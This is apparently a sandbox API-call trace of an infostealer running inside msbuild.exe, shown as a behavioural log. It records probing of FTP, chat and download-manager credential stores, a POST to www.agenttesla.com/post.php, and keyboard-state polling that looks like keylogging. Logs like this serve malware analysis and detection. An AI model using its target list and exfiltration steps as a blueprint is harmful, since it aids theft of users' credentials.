Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Unmap - True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_type True 2
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, size = 4096, size_out = 475 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, size = 4096, size_out = 0 True 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 2
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_type True 2
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, size = 4096, size_out = 475 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, size = 4096, size_out = 0 True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Socket Close type = SOCK_STREAM True 1
Socket Send flags = NO_FLAG_SET, size = 263, size_out = 263 True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 284, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 367 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = survey-smiles.com, address_out = 127.0.0.1 True 1
Fn
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Environment Get Environment String name = APPDATA, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\CoreFTP\sites.idx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites, value_name = Host, data = 2147942402 False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesPort, data = 2147942403 False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesUser, data = 2147942403 False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesPW, data = 2147942403 False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value value_name = HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSitesName, data = 2147942403 False 1
Fn
File Get Info filename = C:\ProgramData\DynDNS\Updater\config.dyndns, type = file_attributes False 1
Fn
Environment Get Environment String name = APPDATA, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\FileZilla\recentservers.xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\All Users\AppData\Roaming\FlashFXP\3quick.dat, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Paltalk False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\, type = file_attributes False 1
Fn
COM Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander, value_name = UninstallString, data = 2147942402 False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ftplist.txt, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC False 2
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC False 2
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\DownloadManager\Passwords False 1
Fn
File Get Info filename = C:\Program Files (x86)\jDownloader\config\database.script, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Delete filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Explorer.txt, type = file_attributes False 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, type = file_attributes True 1
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Delete filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt True 1
Fn
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = -4, new_long = 1997940189 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = -4, new_long = 34805690 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read result_out = 1 True 1
Fn
System Get foreground window - True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 1120, result_out = 67699721 True 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 False 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 False 1
Fn
System Get foreground window - True 1
Fn
System Get window text window_text = 2550884 False 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = -127 True 1
Fn
Keyboard Read virtual_key_code = VK_CAPITAL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
